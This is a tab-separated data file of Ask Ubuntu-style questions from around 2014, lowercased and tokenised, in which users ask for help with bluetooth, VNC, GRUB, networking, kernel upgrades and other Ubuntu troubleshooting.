488001	how can i use cisco webex in firefox on 64-bit ubuntu 14.04 ?	i would like to view screen shares and share my screen via webex . i have firefox installed on ubuntu 14.04 ( 64-bit ) . i can join a meeting , but when i try to share my screen or see others ' screens , nothing happens . what do i need to do ?
488007	connect to jbl bluetooth speaker	i can not find it from : i can not even turn bluetooth on from : i can connect to this speaker from my android phone , so i guess the problem is in ubuntu 14.04 . i tried : $ sudo hciconfig hci0 reset ca n't init device hci0 : operation not possible due to rf-kill ( 132 ) $ sudo rfkill list 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-bluetooth : bluetooth soft blocked : yes hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no 7 : hci0 : bluetooth soft blocked : yes hard blocked : no $ sudo rfkill unblock 2 $ sudo rfkill unblock 7 now i can turn it on , but adding device button is disabled .
488011	black screen when accessing ubuntu remote host via vnc and vino-server	i have a headless server and i am trying to setup a vnc connection in order to access it with a gui . now i have only root access via ssh . i have followed most of the instructions given here enable remote vnc from the command line ? . after a lot of problems i reached to a point where vino-server is able to run , but when i connect with a vnc client i reach a black screen . so far i installed vino and ubuntu-desktop . after that i did the following commands : gconftool-2 -- set -- type=bool /desktop/gnome/remote_access/enabled true gsettings set org.gnome.vino erequire-encryption false gsettings set org.gnome.vino lock-screen-on-disconnect false with vino-preferences i clicked to allow to view and control the desktop . also unchecked the confirm incoming connections . i run vino with /usr/lib/vino/vino-serverand this is the output : ( vino-server:8140 ) : eggsmclient-critical ** : egg_sm_client_set_mode : assertion 'global_client == null || global_client_mode == egg_sm_client_mode_disabled ' failed ** ( vino-server:8140 ) : warning ** : your xserver does not support the xtest extension - remote desktop access will be view-only 25/06/2014 02:09:24 pm autoprobing tcp port in ( all ) network interface 25/06/2014 02:09:24 pm listening ipv6 : // [ : : ] :5900 25/06/2014 02:09:24 pm listening ipv4 : //0.0.0.0:5900 25/06/2014 02:09:24 pm autoprobing selected port 5900 25/06/2014 02:09:24 pm advertising security type : 'tls ' ( 18 ) 25/06/2014 02:09:24 pm re-binding socket to listen for vnc connections on tcp port 5900 in ( all ) interface 25/06/2014 02:09:24 pm listening ipv6 : // [ : : ] :5900 25/06/2014 02:09:24 pm listening ipv4 : //0.0.0.0:5900 25/06/2014 02:09:24 pm clearing securitytypes 25/06/2014 02:09:24 pm advertising security type : 'tls ' ( 18 ) 25/06/2014 02:09:24 pm clearing securitytypes 25/06/2014 02:09:24 pm advertising security type : 'tls ' ( 18 ) 25/06/2014 02:09:24 pm advertising authentication type : 'no authentication ' ( 1 ) 25/06/2014 02:09:24 pm re-binding socket to listen for vnc connections on tcp port 5900 in ( all ) interface 25/06/2014 02:09:24 pm listening ipv6 : // [ : : ] :5900 25/06/2014 02:09:24 pm listening ipv4 : //0.0.0.0:5900 25/06/2014 02:09:24 pm clearing securitytypes 25/06/2014 02:09:24 pm clearing authtypes 25/06/2014 02:09:24 pm advertising security type : 'tls ' ( 18 ) 25/06/2014 02:09:24 pm advertising authentication type : 'no authentication ' ( 1 ) 25/06/2014 02:09:24 pm advertising security type : 'no authentication ' ( 1 ) following some google search for the black screen problem i also installed the gnome-core and appended the .vnc/xstartup file like this : # ! /bin/sh # uncomment the following two lines for normal desktop : unset session_manager # exec /etc/x11/xinit/xinitrc gnome-session âsession=gnome-classic & gnome-panel & [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & # x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & # x-window-manager &
488012	ubuntu 14.04 not moving above main screen	i have been having problems when trying to boot ubuntu 14.04 . once i boot up into ubuntu i am forwarded to installation menu . i have chosen the try ubuntu and install ubuntu options but i have had the same outcome both times . it sticks on loader screen . i am stuck on what to do and can someone please help ! i have tried for the past 3 days with no luck and have n't found anyone with the same problem as mine . i have a windows 8.1 already installed on my system . my pc is a hp pavilion x360 . i have an intel celeron n2820 clocked at 2.13 ghz . it uses intel ( r ) hd graphics so i know it is n't based off nvidia drivers . note : i have changed my boot device priority to have usb boot first .
488016	ubuntu minimal virtual machine - drivers	i installed a minimal virtual machine under esxi 5.5 . i added a sas card to that ( adaptec 6805h ) , which is supported in ubunut 14.04 . because i run minimal virtual , the module is not included . how can i add this module ? sudo modprobe pm80xx says : modprobe : fatal : module pm80xx not found .
488017	is there any way to put notes on pdf in evince ?	i am looking for any way to put some comments on the pdf which i open that by the the evince . is there any way to that ?
488023	sony svf14a16clb ubuntu compatibility	has anybody installed ubuntu 14.04 on a vaio fit 14 ? i recently bought a sony vaio fit 14 ( svf14a16clb - intel core i5 3337u , intel hd 4000 ) and it came with windows 8 . i want to install ubuntu , leaving windows 8 for games and some programs .
488024	xubuntu light-locker : where is the configuration stored ?	my companies software stack for linux includes some `` security scripts '' that check if the screensaver is configured according to our security policy . i am about to extend that script to handle light locker . step 1 will be to retrieve the current light-locker settings . so where can i find them ?
488027	ca n't recongnize my ssd device file in /dev	i am using ubuntu and ca n't find my ssd device file . the /dev directory has following contents : agpgart audio audio1 audio2 audio3 audioctl char console core dsp dsp1 dsp2 dsp3 fd full kmem kmsg log loop0 loop1 loop2 loop3 loop4 loop5 loop6 loop7 mem midi0 midi00 midi01 midi02 midi03 midi1 midi2 midi3 mixer mixer1 mixer2 mixer3 mpu401data mpu401stat null port ptmx pts ptyp0 ptyp1 ptyp2 ptyp3 ptyp4 ptyp5 ptyp6 ptyp7 ptyp8 ptyp9 ptypa ptypb ptypc ptypd ptype ptypf ram ram0 ram1 ram10 ram11 ram12 ram13 ram14 ram15 ram16 ram2 ram3 ram4 ram5 ram6 ram7 ram8 ram9 random rmidi0 rmidi1 rmidi2 rmidi3 sequencer shm smpte0 smpte1 smpte2 smpte3 sndstat stderr stdin stdout tty tty0 tty1 tty10 tty11 tty12 tty2 tty3 tty4 tty5 tty6 tty7 tty8 tty9 ttyp0 ttyp1 ttyp2 ttyp3 ttyp4 ttyp5 ttyp6 ttyp7 ttyp8 ttyp9 ttypa ttypb ttypc ttypd ttype ttypf urandom xconsole zero can some one suggest which should represent my ssd file ? the mount command gives following output : /dev/simfs / simfs rw , relatime 0 0 proc /proc proc rw , relatime 0 0 sysfs /sys sysfs rw , relatime 0 0 none /dev/pts devpts rw , nosuid , noexec , relatime , mode=600 , ptmxmode=000 0 0 none /proc/sys/fs/binfmt_misc binfmt_misc rw , nosuid , nodev , noexec , relatime 0 0 none /run tmpfs rw , nosuid , noexec , relatime , size=943720k , mode=755 0 0 none /run/lock tmpfs rw , nosuid , nodev , noexec , relatime , size=5120k 0 0 none /run/shm tmpfs rw , relatime 0 0 contents of /etc/fstab are : proc /proc proc defaults 0 0 none /dev/pts devpts rw , gid=5 , mode=620 0 0 none /run/shm tmpfs defaults 0 0
488031	cleaning up boot details ? ? dual boot ( uefi ) : windows 8 & ubuntu 12.04	well , i do n't know from where to begin with ... i 've a dell laptop ( x64 based processor ) with windows 8 pre-installed ! i tried installing ubuntu 12.04 on my system . ( i do n't know if it suports uefi or not ) . i used a 32-bit ubuntu iso ( somewhere i read that it can be used on both x64 & 32bit processors for installation ) but later saw in some blogs/forum that for dual boot purpose , one has to use the 64-bit iso image for 64bit processor . my system had uefi with secureboot enabled ! by hit and trial , i somehow ( legacy/uefi , secureboot on/off ) managed to install ubuntu on my lappy on a separate partition on the same hd at that time . but i could n't open my windows 8 , i 'd to change some boot options , in order to open it . it was troublesome . i was not able to get grub bootloader menu at all . but to this point , i think what i accidentally did was : '' my windows 8 was installed on uefi secure boot : on option & afterwards i installed the ubuntu on legacy mode secure boot : off . '' since things were n't working well then , so i just deleted the ubuntu drive , formatted it with ntfs fs and used for windows drive and turned the uefi mode , secureboot : on my windows 8 started working fine and it gets open as usual . now the thing is : i 've some small partition named as 'biosgrub ' still , and if i turn to 'legacy mode ' ; nothing gets loaded , and i get a `` grub rescue '' prompt . i do n't know what to do with it . can i rectify all this ? ? i think there 's will be multiple bootloaders in there probably , if i go to install ubuntu again . which wo n't be good at all , i presume ? is it possible to clean all this up , and do a fresh ubuntu ( 14.04 ) install alongside windows 8 ? i know this is a complete mess , but can i do anything about it ... i just want ubuntu alongside my windows 8 , in uefi mode..ie atleast a bootloader screen prompting me to open either windows or ubuntu..
488033	is having swap on hard drive or sd card better ?	i have a bunch of 16gb normal speed sdhc cards , so if i use them i 'm not worried about them getting damaged , but i was wondering : is swap on a 7200rpm 320 gb hard drive that is also the drive ubuntu is installed on better or worse than an sd card with the only use as swap ?
488034	making master pdf editor default for .pdf files	i have followed the answer posted by moderator mitch user 59676 and created mpe.desktop file , right clicked on the file and 'open with other application ' - 'show other applications ' did not list master pdf editor so unable to make as default .
488035	how move indicators in ubuntu 14.04	how can move panel indicators and order them at my leisure ? i 'm using ubuntu 14.04 lts , thanks !
488037	random crashes ubuntu 12.04	every once in a while my mem and cpu max out . in looking at the syslog i found jun 25 01:45:30 id-llc-projects cron [ 29889 ] : ( root ) cmd ( command -v debian-sa1 > /dev/null & & debian-sa1 1 1 ) this ran at the same time the mem and cpu maxed out . what is this command and how do i stop it ?
488038	wd my cloud remote access	how do i get remote access into a wd my cloud ? i tried using wd2go , but it wo n't work even after updating java .
488042	network printer not printing	ubuntu 12.04.4 , canon pixma mg6350 as a network printer on ethernet lan . printer appeared to install ok , but when attempting to print ( anything - even a test page ) the printer panel displays the usual pre-printing info , then just beeps and goes back to its normal `` at rest '' display - nothing is printed . ubuntu briefly displays `` processing '' then reverts to idle . i 've just tried for the 7th time , `` command submitted as job 7 '' - same response - nothing . help !
488044	neither prefork nor worker settings are found in /etc/apache2/apache2.conf - why ?	i 've just installed apache 2.4.7 ( ubuntu ) on my ubuntu 14.04 lts system and ca n't see neither prefork nor worker settings in the /etc/apache2/apache2.conf . they are also not defined for default virtual host . should i set them myself in apache2.conf like this ? < ifmodule mpm_prefork_module > startservers 2 minspareservers 2 maxspareservers 5 maxclients 200 # must be customized serverlimit 200 # must be customized maxrequestsperchild 100 < /ifmodule >
488046	install window 7 after ubuntu 14	can i install window7 on an existing ubuntu 14 laptop by shrinking the ubuntu 14 partition , installing windows 7 into the created freespace , and running boot repair to get the grub boot menu with both windows 7 and ubuntu 14 . here is the layout of my partitions as shown by gparted : partition filesystem size flags /dev/sda1 fat32 512.00 mig boot /dev/sda2 ext4 224.42 gig /dev/sda3 linux-swap 7.97 gig does this still look ok in terms of installing windows after shrinking /dev/sda2 ?
488053	how to install skype 4.3 ?	skype 4.3 is just released with considerable improvements . as a regular skype user i want to use the latest skype on my ubuntu 14.04 , but there is no updates from update manager . even in skype website only skype 4.3 is available only for ubuntu 12.04 . is there anyway to use this latest skype on ubuntu 14.04 or how much we have to wait for the update ?
488055	startup wine compihilo error leads to removal of linux headers	so i get this error about wine-compihilo which tells me to open settings and update from there . then when i go do sudo apt-get upgrade & & apt-get update , it gives me this error about linux-generic-headers by typing in sudo apt-get autoremove . so i do that , but i 'm pretty sure linux headers are important . so how do i reinstall the latest version ? and what are should i do if after reinstallation the wine error comes back ? p.s . i have xubuntu 14.04
488056	dhcp3-server not working correctly	i installed dhcpe-server with apt-get install dhcp3-server , and i want to configure it on terminal . when i type dhcp i just see these : dhclient dhclient-script dhcpd dhcpx i tried to start its service but i cant because it was not in service too . now i do n't know what can i do . i write its config and save it in this directory : /etc/dhcpd/dhcp3.conf and now i want to execute this command but i cant : dhcp3-server -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhclient-eth0.pid at0 said command not found . also when i go to /var/run/ i cant see dhclient-eth0.pid !
488060	adding /usr/share/mibs/cisco to snmp mib search path	is there a way to add arbitrary path ( e.g . /usr/share/mibs/cisco ) to mib search path ? thank you . alexei -- ubuntu 12.04.4 lts
488064	adding multiple text lines with 'convert '	i 'm trying to place multiple lines of text on an image , but the following produces the following error : convert convert : non-conforming drawing primitive definition ( \ ) [ no such file or directory ] . and it will only add the first line of text . here is my command in my script : convert weekback.png -font helvetica-narrow-boldoblique -pointsize 208 \ -draw `` fill black text 450,275 ' $ day1 ' \ fill black text 900,275 ' $ day2 ' `` \ test.png thanks for any help !
488069	tweak grub2 loader	i just dual booted with windows 7 and ubuntu 14.04 . i notice that when windows goes to hibernation mode , when i get out of hiberation mode and get to the grub loader , and choose windows 7 it freezes . is there any kind of edit ( s ) i can make to the /etc/default/grub file that will prevent it from freezing after i choose windows ? edit : this tends to also happen when i am in ubuntu and decide to restart and choose windows . any suggestions ?
488071	robust language check options for linux word processing software	dominantly , i use the pre-installed liberation suite but in essence , i am looking for any word processing means that has robust spelling and grammar checking , and even language-based and style directions , like ms word would do these : its very long - will suggest usage of it 's instead of its sentence ends . but it was narrow . - if style check is on , it will suggest using however instead of but . and the common spelling and grammar errors as usual . any help will be welcome .
488072	setting up a standalone ntp server on ubuntu	i want to setup a standalone ntp server on ubuntu . the problem is all the tutorials i see on the internet are about how to make the server to synchronize with another time server on the internet and then broadcast the time in my network . what i want is the server im setting up to use his own system clock and broadcast it to the network , and not having to synchronize with an internet time server before that . how can i achieve that ? also , on another note , which command can i run on ntpd or ntpdc to check my server and clients are running the deamon correctly ? thanks in advantage
488076	ubuntu completly dependant on installation flash drive	i ca n't turn on my computer unless i have the installation flash drive in , every single time i restart my computer i lose all the files i downloaded for that session . the only thing i can think of is that i am running on a 64-bit computer and my operating system is 32-bit . is the problem easy as that or is it something else ?
488080	how to reset smart data ?	i have a drive that used to have reallocated sectors , until i deleted any data on the affected area and partitioned around it . it works fine , and has worked fine for over a year , i just want to know how i can reset the smart data , as the reallocated sector count has gone back down to 0 , i need to reset smart or something so that i can install windows , as windows 7 does not allow installation on `` failing '' media . any ideas , or any workarounds are appreciated .
488081	fresh install 14.04 , things start crashing	i have a fresh install of 14.04 on a new laptop ( toshiba z30 ) and i 've been following the `` top things to do after install ubuntu '' style websites . issues started not long after installing the `` unity tweak tool '' , before i 've made any tweaks . i 've seen a few suggestions but due to the culmination of issues i 'm kinda stuck unity tweak fonts were untouched , though i 've tried restoring defaults . editing font crashes the tool . ubuntu software center crashes on open terminal does not open so i 'm a littl unsure what i can do to start rectifying the sitation - i 'm not sure how i can uninstall stuff in an attempt to isolate the issue ? an update - i must have been in some post-installation limbo . i reset the computer , and all the installation , file creation , settings etc i made have been lost . i seem to be back at step one , which is fine - but i 'm curious if anyone can suggest what might have happened ? i installed ubuntu from bootable usb
488083	team fortress 2 sound stops working after using microphone	running ubuntu 14.04 lts x64 . when i am playing team fortress 2 through steam , everything is fine until i start using my microphone . after about 20-30 minutes or so , all audio stops working . as far as i can tell in this state , the microphone still works , but i ca n't confirm due to lack of audio . update : i also have setup counter-strike : global offensive through playonlinux/wine , and the sound also stops working in this game , generally when i move from one server to another .
488085	export drivers from windows 7 before dual booting ubuntu	i currently have a hp pavilion dv7 6163us and i am trying to dual boot ubuntu 14.04 and windows 7 . but its a little more complicated , i previously wiped everything on my ssd , set up the partitions using the ubuntu live disk , installed ubuntu , and then when i tried to install windows 7 ( using a generic windows 7 disk ) the graphic where all messed up ( i do not think that it recognized by intel integrated graphics card because windows looked like windows if i had booted into safemode , if you get the analogy ) . currently , i wiped by ssd again and used hp recovery disks to install windows 7 again and all the graphics were correct ( i think this is due to hp installing all the drivers for my laptop ) . i was wondering if i could some how export my drivers that hp installed on my laptop and some how install it on the windows 7 that i install off the generic disk after first installing ubuntu . thanks
488090	second firefox install - with automatic updates if possible	is it possible to get a second completely separate installation of firefox working on ubuntu 12.04 ? i have one installation with many addons , and from time to time i notice that some sites do n't work properly with these addons . i can startup chrome , but sometimes i want to use firefox without addons , without having to shutdown the normal installation to restart without addons , then restart with addons again , and then having to login to gmail , lastpass etc .
488091	i updated my kernel to the latest version but nothing happened . what 's wrong ?	i was trying to install the latest stable kernel 3.15 following the steps written on this webpage : http : //ubuntuhandbook.org/index.php/2014/06/install-upgrade-linux-kernel-3-15/ i followed everything and installed the files , however after rebooting 'uname -r ' still shows what it was showing before i tried to upgrade the kernel : 3.13.0-29-generic why did n't the upgrade work ? edit : i also tried using the command line to upgrade the kernel , but i 'm getting the same result . edit : i ran synaptic and i saw the 3.15 packages in the local or obsolete category . i removed them and installed them again and i noticed that when i update the grub the new kernel is available , but it does n't boot from the new kernel ... or even show it as an option . output on updating grub : utkarsh @ utkarsh-dell-system-xps-l502x : ~ $ sudo update-grub [ sudo ] password for utkarsh : searching for grub installation directory ... found : /boot/grub searching for default file ... found : /boot/grub/default testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst searching for splash image ... none found , skipping ... found kernel : /boot/vmlinuz-3.15.0-031500-lowlatency found kernel : /boot/vmlinuz-3.13.0-29-lowlatency found kernel : /boot/vmlinuz-3.13.0-29-generic found kernel : /boot/vmlinuz-3.13.0-24-generic found kernel : /boot/memtest86+.bin updating /boot/grub/menu.lst ... done
488092	ubuntu 14.04 works full load	i have x61 lenovo - cpu t7200 dual core and 4 gig memory ! i installed ubuntu 14.04 and did all updates and deactivate all animations and the full search . however , still just opening four tabs on chrome makes it super slow ! it is not just about opening or running program , even at the beginning and start up its full load . i increased the swap , from this post but did n't change much ... i appreciate any comment ...
488093	disable laptop display before login	i am looking for a way to disable my laptop 's built in display before ( or right at ) the login screen on ubuntu 14.04 . i have a second monitor , and want to only use that . i already have changed the display settings in system settings , and tried disabling the monitor via ~/.xinitrc , but those only take affect after the login screen . i have also tried disabling it via /etc/rc.local and /etc/init.d/rc.local , but those do not seem to be running ( i added echo `` test1 '' > ~/test1.txt to rc.local and echo `` test2 '' > ~/test2.txt to /init.d/rc.local , and the files are not being created . does anyone have any suggestions ?
488094	wifi will not connect to free network but will connect to home network	i can connect to my home wifi network , but when i try to connect to a free wifi network nothing happens and it almost immediately flashes wifi disconnected on the screen . one complication may be that the free wifi has a hijack page where you have to agree to the terms of service . any known problems or troubleshooting advice ?
488104	application does n't show as installed	i installed inkscape , but the system does not seem to recognize it . i can not launch the application for dash or open a .svg file . when i open an .svg inkscape does not appear as a option . what should i do ? i tried executing it in the terminal but it replies that it is already installed in its latest version . i think these captures explain better my problem . thanks in advance .
488106	how do i use apt to find the homepage for an installed command	i want to view the homepage for many oss projects , for which i know that they probably already installed via packages on my ubuntu 12.04 system . for example , ldconfig is installed and i can get this far $ which ldconfig /sbin/ldconfig $ apt-file search -l /sbin/ldconfig libc-bin so , i think there is a package called `` libc-bin '' installed , but i can not take it any further , as i know not where the actual package is , which seems required for `` dpkg -i '' what i 'm really after is a url which i think can be extracted from that package ( as suggested for rpm-based systems here ) . i 'd like to this in the shell , so that i can script it afterwards
488107	software center in dark theme unreadble	so i am using the dark theme in gdm and the text in the software center is unreadable . i found a workaround by chaning the font color from the .css as follows sudo gedit /usr/share/software-center/ui/gtk3/css/softwarecenter.css @ define-color light-aubergine # ded7db ; - > modify @ define-color super-light-aubergine # f4f1f3 ; - > modify my questions is there a neat way to solve it . so anytime i change the theme the text is changed automatically ?
488108	how determinate the main user in ubuntu from a postinst script ?	i 'm packaging a slim-theme and i 'd like to modify /etc/slim.conf with the theme and the default user so slim just ask the password during login . i suppose most people willing to install a theme for slim are the only users of their machines . postinst scripts are run as root , so i 'm not sure where to look in order to get the main ( unique ? ) user , maybe i could use the user with id 1000 , or take a look at the environment ( pgrep ) and see which users are popular ... and use the id of the more popular user which at the same time is part of the sudo group . does anyone knows of a better approach ?
488109	which wifi cards measure noise level ?	i used iwconfig command in my linux but it is not returning noise level , ieee 802.11bgn essid : '' ****** '' mode : managed frequency:2.412 ghz access point : ********* bit rate=150 mb/s tx-power=16 dbm retry short limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-40 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:736 missed beacon:0 i am using qualcomm atheros ar9485 wireless network adapter ( rev 01 ) ! ! i want to measure noise level , so is there any other wifi card which returns noise level ? ?
488113	upgrading to apache 2.4.7 from apache 2.4.2	hi can any one help me achieve the same apache2 -v server version : apache/2.4.2 ( ubuntu ) server built : jun 27 2012 03:35:35 i want to upgrade to 2.4.7 or higher can any one help
488114	maas juju cloud-init-nonet waiting for network device	i have a node that has successfully been commissioned into a maas pool , i.e. , got declared- > commissioned- > ready . after it got to ready state , i issued juju add-machine to put it in allocated state ; however , upon boot up , i get the following messages : ... . cloud-init-nonet [ 18.88 ] waiting 10 seconds network device cloud-init-nonet [ 20.93 ] waiting 120 seconds network device cloud-init-nonet [ 148.93 ] gave up waiting for network device ... this node is a y500 lenovo laptop , and i had to make the following modifications : its bios is set to legacy with boot priority set to uefi 1st on the boot up grub menu , i added nomodeset , to the end of linux argument line . it should be noted that the 2nd step was initiated , after node was set into allocated mode , to avoid hang up on nouveau driver , during boot up . i also tried adding ether=0,0 , eth0 to the linux argument line to no avail . my initial inclination to blame uefi as the root cause of the problem , has proven to be unfounded . here is what i see now : intermittently , allocated nodes may get stuck waiting for network device , e.g. , after 4-5 reboots my y500 node finally got through , and i was able to deploy it as a nova-compute . i have also noted that rebooting an existing node , say cinder or another nova-compute , results in the same behaviour , which is rather odd , as 2 weeks ago i deployed them with no such problem . the work around , for deployed nodes , is to login in single mode , add a password for ubuntu user , reboot , login with new credentials , and issue dhclient br0 . i 've also have noted that prior to issuing dhclient , br0 is not listed in ifconfig . the problem that i was observing with regard to maas server also wanting to obtain a dhcp ip address , seems to have been due to mismatch between /etc/network/interface and network manager . setting the relevant fields identically in both , gets rid of the annoying dhclient process . i have n't been able to ascertain any new information by going through cloud-inits log files . if there are suggestion , kindly , let me know . ( not sure if this is relevant , but i started seeing this problem as i tried to add 2 more nodes , to existing 10 node setup . )
488115	dpkg options passed to apt apply to dependencies ?	on 12.04 , i 'm running a script with the following line : apt-get -q -y -o dpkg : :options : := '' -- force-confnew '' -- auto-remove -- purge -- no-install recommends install foo i 'm wondering if the passed dpkg option ( in this case `` -- force-confnew '' ) applies to any of the dependencies of the package foo , which , in this case , suppresses the interactive prompt when config files are thrown into a conflict by either upstream or user changes . it 's worth noting that foo is n't traditionally a meta-package by definition as it deploys a number of config files & scripts , as well as pulling in other packages required for the system via dependencies .
488117	ca n't ping my own local machine by ip address ?	i have an ubuntu machine named ci-server , with wired connection and fixed ip address of 192.168.0.214 . when i ping by ip i get the following output : administrator @ ci-server : ~ $ ping 192.168.0.214 ping 192.168.0.214 ( 192.168.0.214 ) 56 ( 84 ) bytes of data . from 192.168.0.22 icmp_seq=1 destination host unreachable from 192.168.0.22 icmp_seq=2 destination host unreachable from 192.168.0.22 icmp_seq=3 destination host unreachable note that it started resolving to the correct ip , but then subsequent message had a different ip . if i do by name it resolves to localhost correctly : administrator @ ci-server : ~ $ ping ci-server ping ci-server ( 127.0.1.1 ) 56 ( 84 ) bytes of data . 64 bytes from ci-server ( 127.0.1.1 ) : icmp_seq=1 ttl=64 time=0.019 ms 64 bytes from ci-server ( 127.0.1.1 ) : icmp_seq=2 ttl=64 time=0.038 ms ... the route command gives me this : administrator @ ci-server : ~ $ route kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 192.168.0.0 * 255.255.255.0 u 0 0 0 eth0 and 192.168.0.1 is the correct gateway . i 'm not sure about that second entry over there.. should that be removed ? the traceroute does n't seem useful : administrator @ ci-server : ~ $ traceroute 192.168.0.214 traceroute to 192.168.0.214 ( 192.168.0.214 ) , 30 hops max , 60 byte packets 1 192.168.0.22 ( 192.168.0.22 ) 2998.079 ms ! h 2997.933 ms ! h 2997.921 ms ! h this is a vm running on vmware workstation using bridged network . i can not ping it from the host , and other vms can not ping each other . they were cloned from a template machine so they all have the same issue . i do n't know how to proceed with this . when a process ( tomcat ant tasks ) tries to reach another machine in my network by name , it fails with `` java.net.noroutetohostexception : no route to host '' . any help with this is greatly appreciated !
488119	installation not giving option to install along side windows 8 ?	i 'm trying to install ( from dvd ) ubuntu 14.04 lts on my desktop computer along side windows 8.1 . i am never given the option to do so . i never get this screen :
488120	creating a bootable usb stick on mac os	so , i 'm really excited to get my hands on my first linux system . i did all the steps required for downloading ubuntu , until the step with creating a bootable usb stick , wher ei have a problem . i followed the steps in the link : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-mac-osx and i arrived at step 8 , where it says : execute sudo dd if=/path/to/downloaded.img of=/dev/rdiskn bs=1m here is what i typed in : sudo dd if=ubuntu-14.04-desktop-amd64+mac.img.dmg of=/dev/rdisk1 bs=1m after waiting for 3 minutes and a half ( or 210.289801 seconds ) of data transfer ( of 1008730112 bytes ) i get a window with the message : the disk you inserted was not readable by this computer with options to : `` initialize ... '' , `` ignore '' , or `` eject '' q : how do i solve this problem ? ( bonus : where did all the data go ? )
488125	ubuntu 14.04 ignoring network settings performed in the ui ?	i have installed ubuntu 14.04 lts server , and then added a minimal desktop like so : sudo apt-get install ubuntu-desktop -- no-install-recommends then i complemented the install with the following packages so i could get a usable ui : sudo apt-get install gnome-disk-utility gnome-terminal libpam-gnome-keyring libproxy1-plugin-gsettings libproxy1-plugin-networkmanager network-manager-gnome network-manager-pptp network-manager-pptp-gnome ttf-ubuntu-font-family xdg-utils sudo apt-get install unity-control-center unity-lens-applications unity-lens-files indicator-session indicator-power indicator-keyboard indicator-datetime indicator-sound indicator-application indicator-appmenu hud it almost works perfectly . except for the network . i configured a wired connection using fixed ip address gui as follows : but regardless , my ip is always chosen at random and the connection keeps showing as never used in the ui despite multiple reboots . if i click on the networking icon and the in `` connection information '' i get the following : ipconfig -a gives me this : administrator @ ci-server : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 00:0c:29 : f2 : c6:26 inet addr:192.168.0.22 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fef2 : c626/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4991 errors:0 dropped:0 overruns:0 frame:0 tx packets:3162 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2295739 ( 2.2 mb ) tx bytes:479519 ( 479.5 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:35233 errors:0 dropped:0 overruns:0 frame:0 tx packets:35233 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5458696 ( 5.4 mb ) tx bytes:5458696 ( 5.4 mb ) what am i missing ? did i forget any packages to make this ui work ? **update : ** this is my /etc/network/interfaces file : administrator @ ci-server : ~ $ cat /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp thank you !
488127	why are wireless networks that work for other people super slow on my lenovo yoga ?	i am helping a friend troubleshoot her new lenovo yoga 2 , running a fresh install of ubuntu 14.04 . she 's getting kicked off of wireless networks a lot , and her connection is super slow . i 'm running 14.04 on a lenovo x1 and using the same wireless network and not having any trouble . when i run nm-tool i see ( among other things ) : capabilities : speed : 54 mb/s she sees : capabilities : speed : 9 mb/s similarly , iwconfig shows a much slower connection for her : hilary @ hilary : ~ $ iwconfig lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' young turnip '' mode : managed frequency:2.437 ghz access point : 00:22:6b:87 : d6:6b bit rate=11 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : on link quality=34/70 signal level=-76 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:1 invalid misc:126 missed beacon:0 i see bit rate=54 mb/s when i run iwconfig . i spotted this question : slow wireless connection on lenovo but i 'm not clear on what he 's actually disabling there . per my wireless/wifi connection does not work . what information is needed to diagnose the issue ? , here are the full diagnostics : script results how do we troubleshoot this ?
488139	installed ubuntu 14.04 - can not connect to internet with wired or wireless connection	i just installed linux and ubuntu 14.04 alongside my windows 8 on my hp pavilion . first , i had problems with the graphics card and it said it could only operate in low graphics mode.but it just stall when i tried this . i have googled some potential fixes for this , but they all require an internet connection which i am unable to obtain . i can boot in recovery mode , but i ca n't connect to either a wired or wireless connection . it can see both but ca n't connect , just keeps trying to connect . any help on either issue would be greatly appreciated . $ sudo lshw -c network *-network -description : wireless interface -product : rt3290 wireless 802.11n 1t/1r pcie -vendor : ralink corp. -physical id : 0 -bus info : pci @ 0000:08:00.0 -logical name : wlan0 -version : 00 -serial : 54:35:30:80 : eb:01 -width : 32 bits -clock : 33mhz -capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless -configuration : broadcast=yes driver=rt2800pci driverversion=3.13.0-29-generic firmware=0.37 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:18 memory : c2610000-c261ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 08 serial : a0:1d:48 : e4 : ff : c4 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8106e-2_0.0.1 04/23/13 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:59 ioport:4000 ( size=256 ) memory : c2504000-c2504fff memory : c2500000-c2503fff $ ifconfig -a eth0 link encap : ethernet hwaddr a0:1d:48 : e4 : ff : c4 inet6 addr : fe80 : :a21d:48ff : fee4 : ffc4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:36631 errors:0 dropped:0 overruns:0 frame:0 tx packets:189 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2200377 ( 2.2 mb ) tx bytes:38826 